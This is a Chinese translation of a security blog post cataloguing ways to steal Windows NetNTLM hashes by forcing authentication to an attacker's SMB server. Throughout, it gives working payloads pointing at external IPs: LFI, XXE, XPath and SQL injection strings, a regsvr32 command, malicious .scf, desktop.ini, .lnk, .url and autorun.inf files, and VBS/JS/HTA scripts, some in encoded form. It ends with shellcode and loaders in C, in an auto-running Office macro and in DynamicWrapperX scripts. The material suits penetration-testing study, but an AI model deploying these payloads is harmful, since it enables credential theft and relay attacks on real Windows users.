【技术分享】窃取NTLM HASH的多种奇妙方法
2017-03-27 11:23:47
来源:osandamalith.com 作者:pwn_361
阅读:505次
点赞(0)
收藏
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
翻译:pwn_361
稿费:140RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
前言
当我们想使用Responder工具窃取windows的NTLM HASH时,经常会有一个疑问,用什么办法才能让Windows系统发送NTLM HASH值呢?经过一些实验后,我发现办法有很多,现在,我乐意将我发现的一些很酷的东西分享给大家,所以写了这篇文章。需要说明的是,在我们下面的攻击场景中,你不仅可以使用Responder偷取到NTLM HASH值,还可以直接使用SMBRelay攻击方法。
本地文件包含(LFI)
在php中,利用include()函数可以实现解析网络路径的目的(在这里,大家自己想一下,为什么需要触发网络路径解析,触发网络路径解析后,为什么responder工具就有可能会抓取到NTLM HASH值呢?)。利用方法如下图:
http://host.tld/?page=//11.22.33.44/@OsandaMalith
下图是实验结果:
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
XML外部实体注入(XXE)
在这里,我使用了“php://filter/convert.base64-encode/resource=”脚本,该脚本能解析网络路径。
<?xmlversion="1.0"encoding="ISO-8859-1"?>
<!DOCTYPEroot[<!ENTITYxxeSYSTEM"php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith">
]>
<root>
<name></name>
<tel></tel>
<email>OUT&xxe;OUT</email>
<password></password>
</root>
下图是实验结果:
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
XPath注入(XPath Injection)
通常,在out-of-band(OOB) XPath注入攻击中,doc()函数可用于解析网络路径。利用方法如下:
http://host.tld/?title=Foundation&type=*&rent_days=*anddoc('//35.164.153.224/@OsandaMalith')
下图是实验结果:
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
mysql注入
在MySql out-of-band注入中,我写了一篇完整的帖子,大家可以看一下,可用到互联网中。你也可以使用“INTO OUTFILE”去解析一个网络路径。利用方法如下:
http://host.tld/index.php?id=1’unionselect1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00
下图是实验结果:
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
Regsvr32
偶然的一个机会,我发现Regsvr32竟然也能实现我们的目的,利用方法如下:
regsvr32/s/u/i://35.164.153.224/@OsandaMalithscrobj.dll
下图是实验结果:
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
批处理文件
利用批处理文件时,你有很多方法可以去实现目的:
echo1>//192.168.0.1/abc
pushd\\192.168.0.1\abc
cmd/k\\192.168.0.1\abc
cmd/c\\192.168.0.1\abc
start\\192.168.0.1\abc
mkdir\\192.168.0.1\abc
type\\192.168.0.1\abc
dir\\192.168.0.1\abc
find,findstr,[x]copy,move,replace,del,renameandmanymore!
下图是实验结果:
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
Windows自动完成(Auto-Complete)
你只需要在合适的位置输入“\\host\”,就可以自动完成,输入位置如下:
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
Autorun.inf
需要说明的是,这种方法只适用于Windows 7以下系统,因为在Windows 7以上系统中,这个功能被取消了。不过,你可以通过修改自动运行的组策略,重新启用这个功能。在实际运用时,最好确保Autorun.inf文件是隐藏的,方法如下:
[autorun]
open=\\35.164.153.224\setup.exe
icon=something.ico
action=openSetup.exe
SHELL命令文件
你可以将它存储为“.scf”文件,一旦打开文件夹资源管理器,它将会尝试解析图标的网络路径。
[Shell]
Command=2
IconFile=\\35.164.153.224\test.ico
[Taskbar]
Command=ToggleDesktop
Desktop.ini
Desktop.ini文件中包含了你要应用到文件夹的图标信息。我们可以将它用于解析一个网络路径。一旦你打开这个文件夹,它就会自动解析网络路径,就可以得到HASH,利用方法如下:
mkdiropenMe
attrib+sopenMe
cdopenMe
echo[.ShellClassInfo]>desktop.ini
echoIconResource=\\192.168.0.1\aa>>desktop.ini
attrib+s+hdesktop.ini
需要注意的是,在XP系统中,Desktop.ini文件使用“IcondFile”代替了“IconResource”。
[.ShellClassInfo]
IconFile=\\192.168.0.1\aa
IconIndex=1337
快捷方式文件(.lnk)
我们可以创建一个包含网络路径的快捷方式文件,当你打开打时,Windows就会尝试解析网络路径。你还可以指定快捷键以触发快捷方式。对于图标位置,你可以使用一个Windows二进制文件、或位于system32目录中的shell32.dll、Ieframe.dll、imageres.dll、pnidui.dll、wmploc.dll等。
Setshl=CreateObject("WScript.Shell")
Setfso=CreateObject("Scripting.FileSystemObject")
currentFolder=shl.CurrentDirectory
Setsc=shl.CreateShortcut(fso.BuildPath(currentFolder,"\StealMyHashes.lnk"))
sc.TargetPath="\\35.164.153.224\@OsandaMalith"
sc.WindowStyle=1
sc.HotKey="Ctrl+Alt+O"
sc.IconLocation="%windir%\system32\shell32.dll,3"
sc.Description="IwillStealyourHashes"
sc.Save
下面是对应的Powershell版:
$objShell=New-Object-ComObjectWScript.Shell
$lnk=$objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath="\\35.164.153.224\@OsandaMalith"
$lnk.WindowStyle=1
$lnk.IconLocation="%windir%\system32\shell32.dll,3"
$lnk.Description="IwillStealyourHashes"
$lnk.HotKey="Ctrl+Alt+O"
$lnk.Save()
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
Internet快捷方式(.url)
另一个可以利用的快捷方式是Internet快捷方式,你可以将下面的代码存储为“.url”文件:
echo[InternetShortcut]>stealMyHashes.url
echoURL=file://192.168.0.1/@OsandaMalith>>stealMyHashes.url
注册表自动运行
可以在下列路径中添加一个新的注册表项:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
需要添加的内容如下:
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
Powershell
在Powershell中,存在很多可以解析网络路径的小脚本,部分利用方法如下:
Invoke-Item\\192.168.0.1\aa
Get-Content\\192.168.0.1\aa
Start-Process\\192.168.0.1\aa
IE
IE可以解析UNC路径,利用方法如下:
<imgsrc="\\\\192.168.0.1\\aa">
你也可以将它注入到XSS中,或你发现的SQL注入场景中,例如:
http://host.tld/?id=-1'unionselect1,'<imgsrc="\\\\192.168.0.1\\aa">';%00
VBScript
你可以将下面的代码存储为“.vbs”文件,或者内嵌到Word/Excel文件的宏里面:
Setfso=CreateObject("Scripting.FileSystemObject")
Setfile=fso.OpenTextFile("//192.168.0.100/aa",1)
你也可以将它应用到WEB网页中,不过这种方法只适用于IE:
S<html>
<scripttype="text/Vbscript">
<!--
Setfso=CreateObject("Scripting.FileSystemObject")
Setfile=fso.OpenTextFile("//192.168.0.100/aa",1)
//-->
</script>
</html>
下面是编码过的版本,你可以将它进行编码,并存储为“.vbe”文件:
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2yczmCE~8#XSAAAA==^#~@
也可以在HTML文件中应用它。不过还是只适用于IE。你需要将它存储为“.hta”文件,利用方法如下:
<html>
<scripttype="text/Vbscript.Encode">
<!--
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2yczmCE~8#XSAAAA==^#~@
//-->
</script>
</html>
JScript
利用这种方法时,需要将下面的代码存储为Windows的“js”文件:
varfso=newActiveXObject("Scripting.FileSystemObject")
fso.FileExists("//192.168.0.103/aa")
同样,也可以应用于“.hta”文件中,不过还是只适用于IE:
<html>
<scripttype="text/Jscript">
<!--
varfso=newActiveXObject("Scripting.FileSystemObject")
fso.FileExists("//192.168.0.103/aa")
//-->
</script>
</html>
编码版,需要存储为“.jse”文件:
#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
HTML版本:
<html>
<scripttype="text/Jscript.Encode">
<!--
#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
//-->
</script>
</html>
Windows脚本文件
将下面的代码存储为“.wsf”文件:
<package>
<jobid="boom">
<scriptlanguage="VBScript">
Setfso=CreateObject("Scripting.FileSystemObject")
Setfile=fso.OpenTextFile("//192.168.0.100/aa",1)
</script>
</job>
</package>
Shellcode
下面的Shellcode使用了CreateFile函数,并尝试读取一个不存在的网络路径。你可以使用类似Responder的工具抓取NTLM HASH值。通过修改Shellcode,攻击者甚至可以直接偷取网络中传输的其他HASH。也可以执行SMBRelay攻击。代码如下:
/*
Title:CreateFileShellcode
Author:OsandaMalithJayathissa(@OsandaMalith)
Website:https://osandamalith.com
Size:368Bytes
*/
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<windows.h>
intmain(){
char*shellcode=
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02"
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x29\x01\x05\x05"
"\xb9\x02\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x56\xb9\x8d\x10"
"\xb7\xf8\xe8\x5f\x05\x05\x05\x68\x31\x01\x05\x05\xff\xd0\xb9\xe0"
"\x53\x31\x4b\xe8\x4e\x05\x05\x05\xb9\xac\xd5\xaa\x88\x8b\xf0\xe8"
"\x42\x05\x05\x05\x6a\x05\x68\x80\x05\x05\x05\x6a\x03\x6a\x05\x6a"
"\x01\x68\x05\x05\x05\x80\x68\x3e\x01\x05\x05\xff\xd0\x6a\x05\xff"
"\xd6\x33\xc0\x5e\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe"
"\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b"
"\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89"
"\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40"
"\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff"
"\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f"
"\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7"
"\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
"\x21\x05\x05\x05\x50\x05\x05\x05\x6b\x65\x72\x6e\x65\x6c\x33\x32"
"\x2e\x64\x6c\x6c\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05";
DWORDoldProtect;
wprintf(L"Length:%dbytes\n@OsandaMalith",strlen(shellcode));
BOOLret=VirtualProtect(shellcode,strlen(shellcode),PAGE_EXECUTE_READWRITE,&oldProtect);
if(!ret){
fprintf(stderr,"%s","ErrorOccured");
returnEXIT_FAILURE;
}
((void(*)(void))shellcode)();
VirtualProtect(shellcode,strlen(shellcode),oldProtect,&oldProtect);
returnEXIT_SUCCESS;
}
https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
将Shellcode嵌入到宏里
在这里,我们将上面的Shellcode嵌入到Word/Excel宏里面。你可以使用同样的代码嵌入到一个VB6应用程序中:
'Author:OsandaMalithJayathissa(@OsandaMalith)
'Title:Shellcodetorequestanon-existingnetworkpath
'Website:https://osandamalith
'Shellcode:https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
'Thisisaword/excelmacro.Thiscanbeusedinvb6applicationsaswell
#IfVba7Then
PrivateDeclarePtrSafeFunctionCreateThreadLib"kernel32"(_
ByVallpThreadAttributesAsLong,_
ByValdwStackSizeAsLong,_
ByVallpStartAddressAsLongPtr,_
lpParameterAsLong,_
ByValdwCreationFlagsAsLong,_
lpThreadIdAsLong)AsLongPtr
PrivateDeclarePtrSafeFunctionVirtualAllocLib"kernel32"(_
ByVallpAddressAsLong,_
ByValdwSizeAsLong,_
ByValflAllocationTypeAsLong,_
ByValflProtectAsLong)AsLongPtr
PrivateDeclarePtrSafeFunctionRtlMoveMemoryLib"kernel32"(_
ByValDestinationAsLongPtr,_
ByRefSourceAsAny,_
ByValLengthAsLong)AsLongPtr
#Else
PrivateDeclareFunctionCreateThreadLib"kernel32"(_
ByVallpThreadAttributesAsLong,_
ByValdwStackSizeAsLong,_
ByVallpStartAddressAsLong,_
lpParameterAsLong,_
ByValdwCreationFlagsAsLong,_
lpThreadIdAsLong)AsLong
PrivateDeclareFunctionVirtualAllocLib"kernel32"(_
ByVallpAddressAsLong,_
ByValdwSizeAsLong,_
ByValflAllocationTypeAsLong,_
ByValflProtectAsLong)AsLong
PrivateDeclareFunctionRtlMoveMemoryLib"kernel32"(_
ByValDestinationAsLong,_
ByRefSourceAsAny,_
ByValLengthAsLong)AsLong
#EndIf
ConstMEM_COMMIT=&H1000
ConstPAGE_EXECUTE_READWRITE=&H40
SubAuto_Open()
DimsourceAsLong,iAsLong
#IfVba7Then
DimlpMemoryAsLongPtr,lResultAsLongPtr
#Else
DimlpMemoryAsLong,lResultAsLong
#EndIf
DimbShellcode(376)AsByte
bShellcode(0)=232
bShellcode(1)=255
bShellcode(2)=255
bShellcode(3)=255
bShellcode(4)=255
bShellcode(5)=192
bShellcode(6)=95
bShellcode(7)=185
bShellcode(8)=85
bShellcode(9)=3
bShellcode(10)=2
bShellcode(11)=2
bShellcode(12)=129
bShellcode(13)=241
bShellcode(14)=2
bShellcode(15)=2
bShellcode(16)=2
.....................
lpMemory=VirtualAlloc(0,UBound(bShellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)
Fori=LBound(bShellcode)ToUBound(bShellcode)
source=bShellcode(i)
lResult=RtlMoveMemory(lpMemory+i,source,1)
Nexti
lResult=CreateThread(0,0,lpMemory,0,0,0)
EndSub
SubAutoOpen()
Auto_Open
EndSub
SubWorkbook_Open()
Auto_Open
EndSub
https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba
将Shellcode嵌入到VBS和JS代码中
subTee做了很多关于JS和DynamicWrapperX的研究。你可以找到一个使用DynamicWrapperX DLL的POC,根据他的研究,我将Shellcode嵌入到了JS和VBS中。有趣的是,我可以将Shellcode嵌入JScript或VBScript脚本中,再将这些脚本内嵌到HTML或“.hta”格式的文件中:
JScript:
/*
*Author:OsandaMalithJayathissa(@OsandaMalith)
*Title:Shellcodetorequestanon-existingnetworkpath
*Website:https://osandamalith
*Shellcode:https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
*BasedonsubTee'sJS:https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
*/
DX=newActiveXObject("DynamicWrapperX");
DX.Register("kernel32.dll","VirtualAlloc","i=luuu","r=u");
DX.Register("kernel32.dll","CreateThread","i=uullu","r=u");
DX.Register("kernel32.dll","WaitForSingleObject","i=uu","r=u");
varMEM_COMMIT=0x1000;
varPAGE_EXECUTE_READWRITE=0x40;
varsc=[
0xe8,0xff,0xff,0xff,0xff,0xc0,0x5f,0xb9,0x55,0x03,0x02,0x02,0x81,0xf1,0x02,0x02,0x02,0x02,0x83,0xc7,
0x1d,0x33,0xf6,0xfc,0x8a,0x07,0x3c,0x05,0x0f,0x44,0xc6,0xaa,0xe2,0xf6,0xe8,0x05,0x05,0x05,0x05,0x5e,
0x8b,0xfe,0x81,0xc6,0x29,0x01,0x05,0x05,0xb9,0x02,0x05,0x05,0x05,0xfc,0xad,0x01,0x3c,0x07,0xe2,0xfa,
0x56,0xb9,0x8d,0x10,0xb7,0xf8,0xe8,0x5f,0x05,0x05,0x05,0x68,0x31,0x01,0x05,0x05,0xff,0xd0,0xb9,0xe0,
0x53,0x31,0x4b,0xe8,0x4e,0x05,0x05,0x05,0xb9,0xac,0xd5,0xaa,0x88,0x8b,0xf0,0xe8,0x42,0x05,0x05,0x05,
0x6a,0x05,0x68,0x80,0x05,0x05,0x05,0x6a,0x03,0x6a,0x05,0x6a,0x01,0x68,0x05,0x05,0x05,0x80,0x68,0x3e,
0x01,0x05,0x05,0xff,0xd0,0x6a,0x05,0xff,0xd6,0x33,0xc0,0x5e,0xc3,0x33,0xd2,0xeb,0x10,0xc1,0xca,0x0d,
0x3c,0x61,0x0f,0xbe,0xc0,0x7c,0x03,0x83,0xe8,0x20,0x03,0xd0,0x41,0x8a,0x01,0x84,0xc0,0x75,0xea,0x8b,
0xc2,0xc3,0x8d,0x41,0xf8,0xc3,0x55,0x8b,0xec,0x83,0xec,0x14,0x53,0x56,0x57,0x89,0x4d,0xf4,0x64,0xa1,
0x30,0x05,0x05,0x05,0x89,0x45,0xfc,0x8b,0x45,0xfc,0x8b,0x40,0x0c,0x8b,0x40,0x14,0x89,0x45,0xec,0x8b,
0xf8,0x8b,0xcf,0xe8,0xd2,0xff,0xff,0xff,0x8b,0x70,0x18,0x8b,0x3f,0x85,0xf6,0x74,0x4f,0x8b,0x46,0x3c,
0x8b,0x5c,0x30,0x78,0x85,0xdb,0x74,0x44,0x8b,0x4c,0x33,0x0c,0x03,0xce,0xe8,0x96,0xff,0xff,0xff,0x8b,
0x4c,0x33,0x20,0x89,0x45,0xf8,0x33,0xc0,0x03,0xce,0x89,0x4d,0xf0,0x89,0x45,0xfc,0x39,0x44,0x33,0x18,
0x76,0x22,0x8b,0x0c,0x81,0x03,0xce,0xe8,0x75,0xff,0xff,0xff,0x03,0x45,0xf8,0x39,0x45,0xf4,0x74,0x1c,
0x8b,0x45,0xfc,0x8b,0x4d,0xf0,0x40,0x89,0x45,0xfc,0x3b,0x44,0x33,0x18,0x72,0xde,0x3b,0x7d,0xec,0x75,
0x9c,0x33,0xc0,0x5f,0x5e,0x5b,0xc9,0xc3,0x8b,0x4d,0xfc,0x8b,0x44,0x33,0x24,0x8d,0x04,0x48,0x0f,0xb7,
0x0c,0x30,0x8b,0x44,0x33,0x1c,0x8d,0x04,0x88,0x8b,0x04,0x30,0x03,0xc6,0xeb,0xdf,0x21,0x05,0x05,0x05,
0x50,0x05,0x05,0x05,0x6b,0x65,0x72,0x6e,0x65,0x6c,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x05,0x2f,0x2f,0x33,
0x35,0x2e,0x31,0x36,0x34,0x2e,0x31,0x35,0x33,0x2e,0x32,0x32,0x34,0x2f,0x61,0x61,0x05];
varscLocation=DX.VirtualAlloc(0,sc.length,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
for(vari=0;i<sc.length;i++)DX.NumPut(sc[i],scLocation,i);
varthread=DX.CreateThread(0,0,scLocation,0,0);
https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js
VBScript:
'Author:OsandaMalithJayathissa(@OsandaMalith)
'Title:Shellcodetorequestanon-existingnetworkpath
'Website:https://osandamalith
'Shellcode:https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
'BasedonsubTee'sJS:https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
SetDX=CreateObject("DynamicWrapperX")
DX.Register"kernel32.dll","VirtualAlloc","i=luuu","r=u"
DX.Register"kernel32.dll","CreateThread","i=uullu","r=u"
DX.Register"kernel32.dll","WaitForSingleObject","i=uu","r=u"
ConstMEM_COMMIT=&H1000
ConstPAGE_EXECUTE_READWRITE=&H40
shellcode=Array(_
&He8,&Hff,&Hff,&Hff,&Hff,&Hc0,&H5f,&Hb9,&H55,&H03,&H02,&H02,&H81,&Hf1,&H02,&H02,&H02,&H02,&H83,&Hc7,_
&H1d,&H33,&Hf6,&Hfc,&H8a,&H07,&H3c,&H05,&H0f,&H44,&Hc6,&Haa,&He2,&Hf6,&He8,&H05,&H05,&H05,&H05,&H5e,_
&H8b,&Hfe,&H81,&Hc6,&H29,&H01,&H05,&H05,&Hb9,&H02,&H05,&H05,&H05,&Hfc,&Had,&H01,&H3c,&H07,&He2,&Hfa,_
&H56,&Hb9,&H8d,&H10,&Hb7,&Hf8,&He8,&H5f,&H05,&H05,&H05,&H68,&H31,&H01,&H05,&H05,&Hff,&Hd0,&Hb9,&He0,_
&H53,&H31,&H4b,&He8,&H4e,&H05,&H05,&H05,&Hb9,&Hac,&Hd5,&Haa,&H88,&H8b,&Hf0,&He8,&H42,&H05,&H05,&H05,_
&H6a,&H05,&H68,&H80,&H05,&H05,&H05,&H6a,&H03,&H6a,&H05,&H6a,&H01,&H68,&H05,&H05,&H05,&H80,&H68,&H3e,_
&H01,&H05,&H05,&Hff,&Hd0,&H6a,&H05,&Hff,&Hd6,&H33,&Hc0,&H5e,&Hc3,&H33,&Hd2,&Heb,&H10,&Hc1,&Hca,&H0d,_
&H3c,&H61,&H0f,&Hbe,&Hc0,&H7c,&H03,&H83,&He8,&H20,&H03,&Hd0,&H41,&H8a,&H01,&H84,&Hc0,&H75,&Hea,&H8b,_
&Hc2,&Hc3,&H8d,&H41,&Hf8,&Hc3,&H55,&H8b,&Hec,&H83,&Hec,&H14,&H53,&H56,&H57,&H89,&H4d,&Hf4,&H64,&Ha1,_
&H30,&H05,&H05,&H05,&H89,&H45,&Hfc,&H8b,&H45,&Hfc,&H8b,&H40,&H0c,&H8b,&H40,&H14,&H89,&H45,&Hec,&H8b,_
&Hf8,&H8b,&Hcf,&He8,&Hd2,&Hff,&Hff,&Hff,&H8b,&H70,&H18,&H8b,&H3f,&H85,&Hf6,&H74,&H4f,&H8b,&H46,&H3c,_
&H8b,&H5c,&H30,&H78,&H85,&Hdb,&H74,&H44,&H8b,&H4c,&H33,&H0c,&H03,&Hce,&He8,&H96,&Hff,&Hff,&Hff,&H8b,_
&H4c,&H33,&H20,&H89,&H45,&Hf8,&H33,&Hc0,&H03,&Hce,&H89,&H4d,&Hf0,&H89,&H45,&Hfc,&H39,&H44,&H33,&H18,_
&H76,&H22,&H8b,&H0c,&H81,&H03,&Hce,&He8,&H75,&Hff,&Hff,&Hff,&H03,&H45,&Hf8,&H39,&H45,&Hf4,&H74,&H1c,_
&H8b,&H45,&Hfc,&H8b,&H4d,&Hf0,&H40,&H89,&H45,&Hfc,&H3b,&H44,&H33,&H18,&H72,&Hde,&H3b,&H7d,&Hec,&H75,_
&H9c,&H33,&Hc0,&H5f,&H5e,&H5b,&Hc9,&Hc3,&H8b,&H4d,&Hfc,&H8b,&H44,&H33,&H24,&H8d,&H04,&H48,&H0f,&Hb7,_
&H0c,&H30,&H8b,&H44,&H33,&H1c,&H8d,&H04,&H88,&H8b,&H04,&H30,&H03,&Hc6,&Heb,&Hdf,&H21,&H05,&H05,&H05,_
&H50,&H05,&H05,&H05,&H6b,&H65,&H72,&H6e,&H65,&H6c,&H33,&H32,&H2e,&H64,&H6c,&H6c,&H05,&H2f,&H2f,&H33,_
&H35,&H2e,&H31,&H36,&H34,&H2e,&H31,&H35,&H33,&H2e,&H32,&H32,&H34,&H2f,&H61,&H61,&H05)
scLocation=DX.VirtualAlloc(0,UBound(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)
Fori=LBound(shellcode)toUBound(shellcode)
DX.NumPutshellcode(i),scLocation,i
Next
thread=DX.CreateThread(0,0,scLocation,0,0)
https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vbs
在Windows系统中,可能还存在很多种窃取NTLM HASH的方法,你可以断续探索。
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
![【技术分享】窃取NTLM HASH的多种奇妙方法]()
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
